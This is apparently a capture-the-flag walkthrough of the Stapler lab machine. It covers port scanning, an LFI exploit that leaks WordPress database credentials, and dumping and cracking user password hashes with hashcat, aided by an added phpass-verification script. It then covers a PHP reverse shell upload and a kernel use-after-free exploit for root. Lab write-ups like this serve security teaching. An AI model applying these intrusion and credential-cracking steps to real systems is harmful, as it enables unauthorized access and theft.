Enumeration led to a vulnerable WordPress plugin, which gave the initial foothold on the machine. A vulnerable kernel version then allowed privilege escalation to root.
Initial nmap scan of the default top 1000 ports (the output below shows 992 filtered, so 1000 were scanned):
nmap -Pn stapler -oN nmap/initial
which gave:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-07 21:46 +0545
Nmap scan report for stapler (192.168.67.148)
Host is up (0.17s latency).
Not shown: 992 filtered tcp ports (no-response)
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 20.08 seconds
The host did not answer ping yet had open ports (80 among them), so it evidently drops ICMP echo; -Pn skips host discovery for that reason. A full port scan was started in the background while recon continued on the ports already found.
nmap scan with default scripts (-sC), version detection (-sV) and OS detection (-O) against the ports found so far:
sudo nmap -sC -sV -O -Pn -p20,21,22,80,139,666,3306 -oA nmap/all
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-07 21:49 +0545
Nmap scan report for stapler (192.168.67.148)
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.49.67
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp open tcpwrapped
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open doom?
| fingerprint-strings:
| NULL:
| message2.jpgUT
| QWux
| "DL[E
| #;3[
| \xf6
| u([r
| qYQq
| Y_?n2
| 3&M~{
| 9-a)T
| L}AJ
|_ .npy.9
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
| mysql-info:
| Protocol: 10
| Version: 5.7.12-0ubuntu1
| Thread ID: 11
| Capabilities flags: 63487
| Some Capabilities: InteractiveClient, IgnoreSigpipes, Speaks41ProtocolOld, FoundRows, ODBCClient, Support41Auth, SupportsCompression, LongPassword, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, SupportsTransactions, LongColumnFlag, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: <VlJUArMLX:~\x19m02?;
| W
|_ Auth Plugin Name: mysql_native_password
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.92%I=7%D=7/7%Time=62C70407%P=x86_64-pc-linux-gnu%r(NULL
SF:,2D58,"PK\x03\x04\x14\0\x02\0\x08\0d\x80\xc3Hp\xdf\x15\x81\xaa,\0\0\x15
SF:2\0\0\x0c\0\x1c\0message2\.jpgUT\t\0\x03\+\x9cQWJ\x9cQWux\x0b\0\x01\x04
SF:\xf5\x01\0\0\x04\x14\0\0\0\xadz\x0bT\x13\xe7\xbe\xefP\x94\x88\x88A@\xa2
SF:\x20\x19\xabUT\xc4T\x11\xa9\x102>\x8a\xd4RDK\x15\x85Jj\xa9\"DL\[E\xa2\x
SF:0c\x19\x140<\xc4\xb4\xb5\xca\xaen\x89\x8a\x8aV\x11\x91W\xc5H\x20\x0f\xb
SF:2\xf7\xb6\x88\n\x82@%\x99d\xb7\xc8#;3\[\r_\xcddr\x87\xbd\xcf9\xf7\xaeu\
SF:xeeY\xeb\xdc\xb3oX\xacY\xf92\xf3e\xfe\xdf\xff\xff\xff=2\x9f\xf3\x99\xd3
SF:\x08y}\xb8a\xe3\x06\xc8\xc5\x05\x82>`\xfe\x20\xa7\x05:\xb4y\xaf\xf8\xa0
SF:\xf8\xc0\^\xf1\x97sC\x97\xbd\x0b\xbd\xb7nc\xdc\xa4I\xd0\xc4\+j\xce\[\x8
SF:7\xa0\xe5\x1b\xf7\xcc=,\xce\x9a\xbb\xeb\xeb\xdds\xbf\xde\xbd\xeb\x8b\xf
SF:4\xfdis\x0f\xeeM\?\xb0\xf4\x1f\xa3\xcceY\xfb\xbe\x98\x9b\xb6\xfb\xe0\xd
SF:c\]sS\xc5bQ\xfa\xee\xb7\xe7\xbc\x05AoA\x93\xfe9\xd3\x82\x7f\xcc\xe4\xd5
SF:\x1dx\xa2O\x0e\xdd\x994\x9c\xe7\xfe\x871\xb0N\xea\x1c\x80\xd63w\xf1\xaf
SF:\xbd&&q\xf9\x97'i\x85fL\x81\xe2\\\xf6\xb9\xba\xcc\x80\xde\x9a\xe1\xe2:\
SF:xc3\xc5\xa9\x85`\x08r\x99\xfc\xcf\x13\xa0\x7f{\xb9\xbc\xe5:i\xb2\x1bk\x
SF:8a\xfbT\x0f\xe6\x84\x06/\xe8-\x17W\xd7\xb7&\xb9N\x9e<\xb1\\\.\xb9\xcc\x
SF:e7\xd0\xa4\x19\x93\xbd\xdf\^\xbe\xd6\xcdg\xcb\.\xd6\xbc\xaf\|W\x1c\xfd\
SF:xf6\xe2\x94\xf9\xebj\xdbf~\xfc\x98x'\xf4\xf3\xaf\x8f\xb9O\xf5\xe3\xcc\x
SF:9a\xed\xbf`a\xd0\xa2\xc5KV\x86\xad\n\x7fou\xc4\xfa\xf7\xa37\xc4\|\xb0\x
SF:f1\xc3\x84O\xb6nK\xdc\xbe#\)\xf5\x8b\xdd{\xd2\xf6\xa6g\x1c8\x98u\(\[r\x
SF:f8H~A\xe1qYQq\xc9w\xa7\xbe\?}\xa6\xfc\x0f\?\x9c\xbdTy\xf9\xca\xd5\xaak\
SF:xd7\x7f\xbcSW\xdf\xd0\xd8\xf4\xd3\xddf\xb5F\xabk\xd7\xff\xe9\xcf\x7fy\x
SF:d2\xd5\xfd\xb4\xa7\xf7Y_\?n2\xff\xf5\xd7\xdf\x86\^\x0c\x8f\x90\x7f\x7f\
SF:xf9\xea\xb5m\x1c\xfc\xfef\"\.\x17\xc8\xf5\?B\xff\xbf\xc6\xc5,\x82\xcb\[
SF:\x93&\xb9NbM\xc4\xe5\xf2V\xf6\xc4\t3&M~{\xb9\x9b\xf7\xda-\xac\]_\xf9\xc
SF:c\[qt\x8a\xef\xbao/\xd6\xb6\xb9\xcf\x0f\xfd\x98\x98\xf9\xf9\xd7\x8f\xa7
SF:\xfa\xbd\xb3\x12_@N\x84\xf6\x8f\xc8\xfe{\x81\x1d\xfb\x1fE\xf6\x1f\x81\x
SF:fd\xef\xb8\xfa\xa1i\xae\.L\xf2\\g@\x08D\xbb\xbfp\xb5\xd4\xf4Ym\x0bI\x96
SF:\x1e\xcb\x879-a\)T\x02\xc8\$\x14k\x08\xae\xfcZ\x90\xe6E\xcb<C\xcap\x8f\
SF:xd0\x8f\x9fu\x01\x8dvT\xf0'\x9b\xe4ST%\x9f5\x95\xab\rSWb\xecN\xfb&\xf4\
SF:xed\xe3v\x13O\xb73A#\xf0,\xd5\xc2\^\xe8\xfc\xc0\xa7\xaf\xab4\xcfC\xcd\x
SF:88\x8e}\xac\x15\xf6~\xc4R\x8e`wT\x96\xa8KT\x1cam\xdb\x99f\xfb\n\xbc\xbc
SF:L}AJ\xe5H\x912\x88\(O\0k\xc9\xa9\x1a\x93\xb8\x84\x8fdN\xbf\x17\xf5\xf0\
SF:.npy\.9\x04\xcf\x14\x1d\x89Rr9\xe4\xd2\xae\x91#\xfbOg\xed\xf6\x15\x04\x
SF:f6~\xf1\]V\xdcBGu\xeb\xaa=\x8e\xef\xa4HU\x1e\x8f\x9f\x9bI\xf4\xb6GTQ\xf
SF:3\xe9\xe5\x8e\x0b\x14L\xb2\xda\x92\x12\xf3\x95\xa2\x1c\xb3\x13\*P\x11\?
SF:\xfb\xf3\xda\xcaDfv\x89`\xa9\xe4k\xc4S\x0e\xd6P0");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=7/7%OT=21%CT=20%CU=36884%PV=Y%DS=2%DC=I%G=Y%TM=62C7044
OS:4%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10C%TI=Z%TS=8)OPS(O1=M54EST1
OS:1NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54
OS:EST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T
OS:=40%W=7210%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T
OS:2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N
OS:)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
OS:IE(R=N)
Network Distance: 2 hops
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m37s, median: 0s
| smb2-time:
| date: 2022-07-07T16:04:53
|_ start_date: N/A
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED\x00
| Domain name: \x00
| FQDN: red
|_ System time: 2022-07-07T17:04:53+01:00
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.42 seconds
Open were: FTP with anonymous login enabled, port 80 served by the PHP CLI built-in server, MySQL on 3306 exposed to the network, and port 666, whose response starts with PK\x03\x04 (a ZIP local file header) and names a file message2.jpg. All of these looked worth a closer look.
FTP:
The FTP banner displayed:
Harry, make sure to update the banner when you get a chance to show who has access here
and a further message read:
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.
Nothing more could be done with the FTP server (per the nmap ftp-anon output the anonymous session could not even list the directory), but this yielded three usernames: Elly, John and Harry.
The full port scan results came as:
Command: nmap -vvv -Pn -p- stapler -oA nmap/all
# Nmap 7.92 scan initiated Thu Jul 7 21:47:39 2022 as: nmap -vvv -Pn -p- -oA nmap/all stapler
Nmap scan report for stapler (192.168.67.148)
Host is up, received user-set (0.17s latency).
Scanned at 2022-07-07 21:47:39 +0545 for 541s
Not shown: 65524 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
20/tcp closed ftp-data conn-refused
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
53/tcp open domain syn-ack
80/tcp open http syn-ack
123/tcp closed ntp conn-refused
137/tcp closed netbios-ns conn-refused
139/tcp open netbios-ssn syn-ack
666/tcp open doom syn-ack
3306/tcp open mysql syn-ack
12380/tcp open unknown syn-ack
Read data files from: /usr/bin/../share/nmap
# Nmap done at Thu Jul 7 21:56:40 2022 -- 1 IP address (1 host up) scanned in 540.48 seconds
which showed that port 12380 was open as well.
Aggressive nmap scan into port 12380:
Command: nmap -Pn -p12380 -A stapler -oN nmap/port12380
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-07 22:05 +0545
Nmap scan report for stapler (192.168.67.148)
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.41 seconds
curl stapler:12380 returned raw HTML, so rendering it with
curl stapler:12380 | html2text
gave:
****** Coming Soon ******
*** Sorry guys, BSides happened too quick! Didn't have enough time to finish
the website. ***
** Try again next year. **
Made with by Creative_Tim. Free download here.
curl stapler:12380/robots.txt | html2text gave the same result.
Opening http://stapler:12380/blogblog in the browser gave nothing, but https://stapler:12380/blogblog returned a WordPress site. Port 12380 serves different content over TLS than over plain HTTP, so anything checked with curl over http:// (robots.txt included) is worth re-checking over https://.
Directory listing was enabled under https://stapler:12380/blogblog/wp-content/, exposing the plugins, themes and uploads directories.
GET /blogblog/wp-content/plugins
gave:
****** Index of /blogblog/wp-content/plugins ******
[[ICO]] Name Last_modified Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory -
[[DIR]] advanced-video-embed-embed- 2015-10-14 13:52 -
videos-or-playlists/
[[ ]] hello.php 2016-06-03 23:40 2.2K
[[DIR]] shortcode-ui/ 2015-11-12 17:07 -
[[DIR]] two-factor/ 2016-04-12 22:56 -
===========================================================================
Apache/2.4.18 (Ubuntu) Server at stapler Port 12380
Searching exploit-db for the plugin advanced-video-embed-embed-videos-or-playlists/ turned up a local file inclusion (LFI) vulnerability with a public exploit. Downloaded the accompanying python script, adjusted it to the target, and ran it to read files from the server: it retrieved the site's wp-config.php, which contained:
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, and ABSPATH. You can find more information by visiting
* {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
* Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY', 'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY', 'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY', 'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT', 'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT', '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT', 'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define('WP_HTTP_BLOCK_EXTERNAL', true);
With the database credentials (user root, password plbkac) exposed in wp-config.php, and MySQL on 3306 reachable from the network and accepting root remotely, the database could be queried directly:
mysql -u root -p -h stapler
show databases;
use wordpress;
show tables;
select * from wp_users;
MySQL [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
| 1 | John | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | john | [email protected] | http://localhost | 2016-06-03 23:18:47 | | 0 | John Smith |
| 2 | Elly | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | elly | [email protected] | | 2016-06-05 16:11:33 | | 0 | Elly Jones |
| 3 | Peter | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | peter | [email protected] | | 2016-06-05 16:13:16 | | 0 | Peter Parker |
| 4 | barry | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | barry | [email protected] | | 2016-06-05 16:14:26 | | 0 | Barry Atkins |
| 5 | heather | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | heather | [email protected] | | 2016-06-05 16:18:04 | | 0 | Heather Neville |
| 6 | garry | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | garry | [email protected] | | 2016-06-05 16:18:23 | | 0 | garry |
| 7 | harry | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | harry | [email protected] | | 2016-06-05 16:18:41 | | 0 | harry |
| 8 | scott | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | scott | [email protected] | | 2016-06-05 16:18:59 | | 0 | scott |
| 9 | kathy | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | kathy | [email protected] | | 2016-06-05 16:19:14 | | 0 | kathy |
| 10 | tim | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | tim | [email protected] | | 2016-06-05 16:19:29 | | 0 | tim |
| 11 | ZOE | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | zoe | [email protected] | | 2016-06-05 16:19:50 | | 0 | ZOE |
| 12 | Dave | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. | dave | [email protected] | | 2016-06-05 16:20:09 | | 0 | Dave |
| 13 | Simon | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 | simon | [email protected] | | 2016-06-05 16:20:35 | | 0 | Simon |
| 14 | Abby | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. | abby | [email protected] | | 2016-06-05 16:20:53 | | 0 | Abby |
| 15 | Vicki | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | vicki | [email protected] | | 2016-06-05 16:21:14 | | 0 | Vicki |
| 16 | Pam | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | pam | [email protected] | | 2016-06-05 16:42:23 | | 0 | Pam |
+----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+
16 rows in set (0.003 sec)
Extracted the hashes and cracked them with hashcat. The $P$ prefix marks phpass portable hashes, which is hashcat mode 400:
hashcat -m 400 -a 0 hashes /usr/share/wordlists/rockyou.txt
This recovered the password of the user John, which is literally the string incorrect.
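To show what the cracking step actually does, here is an added example (my own code, not part of the original write-up): it parses a wp_users dump in the shape shown above into user:hash lines for hashcat --username, and re-implements the phpass portable hash ($P$, hashcat mode 400) so a cracked candidate can be confirmed offline without re-running hashcat. The sample table is constructed from the John and Elly rows above; the $P$9IQRaTwmfeRo7ud9Fh4E2PdI0S3r.L0 / test12345 pair is phpass's own reference vector from its test.php.

```python
"""Added example (not from the original write-up): turn a wp_users dump into
hashcat input and confirm a cracked password against a WordPress phpass hash.

WordPress "$P$" hashes are phpass portable hashes: MD5 over salt+password,
then 2**count further MD5 rounds over digest+password, encoded with phpass's
own base64 alphabet. hashcat -m 400 implements the same scheme; this pure-
Python check confirms a candidate without re-running hashcat.
"""
from __future__ import annotations

import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Constructed sample in the shape of the MySQL table output above; the two
# hashes are the John and Elly rows from the page, other columns are trimmed.
WP_USERS_DUMP = """\
+----+------------+------------------------------------+---------------+
| ID | user_login | user_pass                          | user_nicename |
+----+------------+------------------------------------+---------------+
|  1 | John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | john          |
|  2 | Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | elly          |
+----+------------+------------------------------------+---------------+
"""


def parse_wp_users(dump: str) -> list[tuple[str, str]]:
    """Return (user_login, user_pass) pairs from a `select * from wp_users` dump."""
    rows = []
    for line in dump.splitlines():
        if not line.startswith("|"):
            continue  # +----+ border lines
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) < 3 or not cells[0].isdigit():
            continue  # header row
        rows.append((cells[1], cells[2]))
    return rows


def hashcat_lines(rows: list[tuple[str, str]]) -> str:
    """user:hash lines, one per row, for `hashcat -m 400 --username`."""
    return "\n".join(f"{user}:{pw_hash}" for user, pw_hash in rows)


def _encode64(data: bytes, count: int) -> str:
    """phpass encode64(): pack bytes little-endian into 6-bit ITOA64 characters."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def phpass_crypt(password: str, setting: str) -> str:
    """Re-run phpass crypt_private(); `setting` is the stored hash (first 12 chars used)."""
    if setting[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])  # 'B' -> 13 -> 8192 rounds
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    salt = setting[4:12].encode()
    if len(salt) != 8:
        raise ValueError("salt must be 8 characters")
    pw = password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_verify(password: str, stored: str) -> bool:
    """True when `password` reproduces `stored`; use it to confirm a hashcat hit."""
    return phpass_crypt(password, stored) == stored


if __name__ == "__main__":
    rows = parse_wp_users(WP_USERS_DUMP)
    print(hashcat_lines(rows))
    # phpass's own reference vector, then the cracked John password from above.
    print(phpass_verify("test12345", "$P$9IQRaTwmfeRo7ud9Fh4E2PdI0S3r.L0"))
    print(phpass_verify("incorrect", rows[0][1]))
```

The iteration count is encoded in the fourth character of the hash, so two $P$B hashes cost the same 8192 MD5 rounds each; that is why hashcat mode 400 is noticeably slower per guess than raw MD5, and why a wordlist attack (-a 0) rather than brute force is the sensible first pass.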
Finally uploaded a PHP reverse shell to the server through the WordPress plugin upload and gained an initial foothold as the web server user.
After getting the foothold, moved to /tmp, downloaded linpeas.sh and ran it. It reported:
OS: Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: red.initech
Writable folder: /dev/shm
which pointed to the kernel version: 4.4.0-21-generic, the Ubuntu 16.04 release kernel. Searching exploit-db for that version turned up a local privilege escalation: the BPF verifier drops its reference to a map file descriptor twice (a double fdput), so the kernel keeps using memory that has already been freed.
The bug is CVE-2016-4557 (kernel/bpf/verifier.c, fixed in Linux 4.5.5), and a public exploit exists for it. Running that use-after-free (UAF) exploit escalated privileges to root. Kernel memory-corruption exploits can crash the target, so confirm the exact kernel build (uname -a) matches the exploit's target before running one.